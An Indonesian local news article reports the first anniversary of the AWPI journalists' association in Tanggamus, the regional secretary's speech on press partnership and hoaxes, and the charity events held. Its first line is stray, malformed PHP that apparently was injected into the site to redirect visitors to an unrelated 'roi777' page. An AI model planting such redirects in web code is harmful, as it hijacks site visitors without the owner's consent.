header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Selamat HUT Perdana AWPI Tanggamus, Ini Pesan Sekda untuk Insan Pers -
Selamat HUT Perdana AWPI Tanggamus, Ini Pesan Sekda untuk Insan Pers
SERAHKAN SANTUNAN: Sekda Tanggamus Hi. Andi Wijaya berkesempatan menyerahkan santunan pada anak yatim/piatu didampingi Ketua DPC AWPI Tanggamus Imron Tara dalam peringatan HUT ke-1 AWPI Tanggamus, Kamis (12/4). (Foto: IST)

TRANSLAMPUNG.COM, TANGGAMUS – Meski sempat diguyur hujan lebat disertai angin kencang, seremoni HUT perdana Dewan Pimpinan Cabang Asosiasi Wartawan Profesional Indonesia Kabupaten Tanggamus, tetap berlangsung khidmat dan akrab. Perlahan namun pasti, organisasi profesi jurnalis yang dikomandoi Kepala Biro Harian Pilar Tanggamus Imron Tara itu, turut melengkapi eksistensi insan pers di Bumi Begawi Jejama.

Puncak peringatan HUT ke-1 DPC AWPI Tanggamus yang dipusatkan di halaman Sekretariat DPC AWPI Kamis (12/4) itu, ditandai dengan penyerahan santunan untuk anak-anak yatim-piatu dan pemotongan nasi tumpeng. Seluruh perwakilan dari organisasi profesi jurnalis di Kabupaten Tanggamus turut hadir dan membaur tanpa ada sekat. Menunjukkan solidaritas dan soliditas serta persatuan seluruh organisasi jurnalis.

Sekretaris Daerah Tanggamus Hi. Andi Wijaya, S.T., M.M., mewakili Penjabat Bupati Ir. Zainal Abidin, mengawali sambutannya dengan mengucapkan selamat hari jadi ke-1 bagi DPC AWPI Tanggamus. Berikutnya, sekda menyampaikan permohonan maaf atas ketidakhadiran Pj. Bupati Tanggamus karena sedang ada keperluan dinas di Provinsi Lampung.

Andi Wijaya mengatakan, meski terkadang diwarnai perbedaan pendapat, kebersamaan dan hubungan baik antara Pemkab Tanggamus dengan insan pers dan organisasi profesi jurnalis, tetap terjalin harmonis. Hal itu dapat dilihat dari tidak adanya polemik yang sampai terlalu menggangu kemitraan antara insan pers dengan Pemkab Tanggamus.

 

“Banyak program yang telah diagendakan Kabupaten Tanggamus. Mulai dari bidang infrastruktur, kesehatan, pendidikan, bahkan pemukiman dan kelestarian lingkungan. Semua program kerja pemkab itu, sangat membutuhkan dukungan dari kawan-kawan (jurnalis). Sebab secara langsung atau tidak langsung, insan pers tersebut bisa memberikan pemahaman kepada masyarakat melalui pemberitaan dan dokumentasi yang mereka lakukan,” ungkap Andi Wijaya.

Pada kesempatan itu, Sekda Tanggamus juga sangat berharap, DPC AWPI bersama seluruh organisasi wartawan dapat bersatu memberantas dan meminimalisir peredaran berita hoax. Andi Wijaya mengakui, pesatnya perkembangan teknologi dan informasi dewasa ini, selain memberikan keuntungan, di sisi lain jika tidak disikapi dengan bijak, juga membawa dampak negatif. Sehingga diharapkan, insan pers di Tanggamus senantiasa menghasilkan berita dan produk jurnalistik lainnya secara berimbang, akurat, dan terpercaya, yang bisa menetralisir opini miring kalangan pembaca.

 

“Atas nama Pemkab Tanggamus, kami sangat berharap, hubungan baik dan harnonis antara pemkab dengan insan pers, dapat berjalan secara berkesinambungan. Sekali lagi saya ucapkan selamat HUT ke-1 DPC AWPI Tanggamus. Semoga Allah melimpahkan rahmat dan hidayahNya untuk kita semua,” harap sekda.

Andi Wijaya juga menyampaikan apresiasi dan rasa bangganya pada AWPI Tanggamus atas berbagai rangkaian kegiatan yang telah dilaksanakan dalam rangka memeriahkan hari jadi mereka. Andi Wijaya menilai, AWPI Tanggamus telah mempelopori kegiatan yang positif bagi warga dan sejalan dengan program Bupati Tanggamus.

 

“Semoga kerja sama yang baik ini tetap terjaga. Sebagai pelaku kontrol sosial, saya berharap agar netralitas kawan-kawan dalam tahun pilkada ini tetap terpelihara. Jangan bergerak atas suatu kepentingan ataupun golongan tertentu. Siapapun bupatinya, kita tetap bekerja secara profesional,” pungkas Sekda Tanggamus.

Kepala Biro Poros Daily Kabupaten Tanggamus Deni Ramdo selaku Ketua Panitia melaporkan, dalam rangka HUT ke-1, DPC AWPI Tanggamus telah menyelengarakan beberapa kegiatan. Antara lain Lomba Merpati Kolongan, Bakti Sosial yang diwujudkan dengan bersih-bersih Pantai Terbaya Kotaagung, dan mensosialisasikan anti berita hoax.

“Sebagai puncak peringatan HUT ke-1 DPC AWPI Tanggamus, kami memberikan santunan kepada anak yatim berupa insentif dan buku tulis,” papar Deni Ramdo, mewakili Imron Tara.

Acara tersebut dihadiri Ketua DPD AWPI Lampung Hengki Ahmad Jajuli; Anggota DPRD Tanggamus Kurnain; perwakilan Kejari, Polres, dan Kodim 0424 Tanggamus;  Ketua DPC AWPI Pringsewu Hi. Akhmad Khotob; Ketua Pimpinan Daerah Ikatan Wartawan Online (IWO) Tanggamus Odo Kuswantoro, S.Kom. bersama Dewan Etik IWO Albertus Yogy Pratama; Ketua DPC KWRI Tanggamus; Dewan Penasehat PWI Ranting Tanggamus Hi. Sanusi beserta Sekretaris PWI Wanda Sunarya, Bendahara PWI Diki H. S. dan Kepala Bidang Kesejahteraan PWI Rio Aldipo. (ayp) 

News Reporter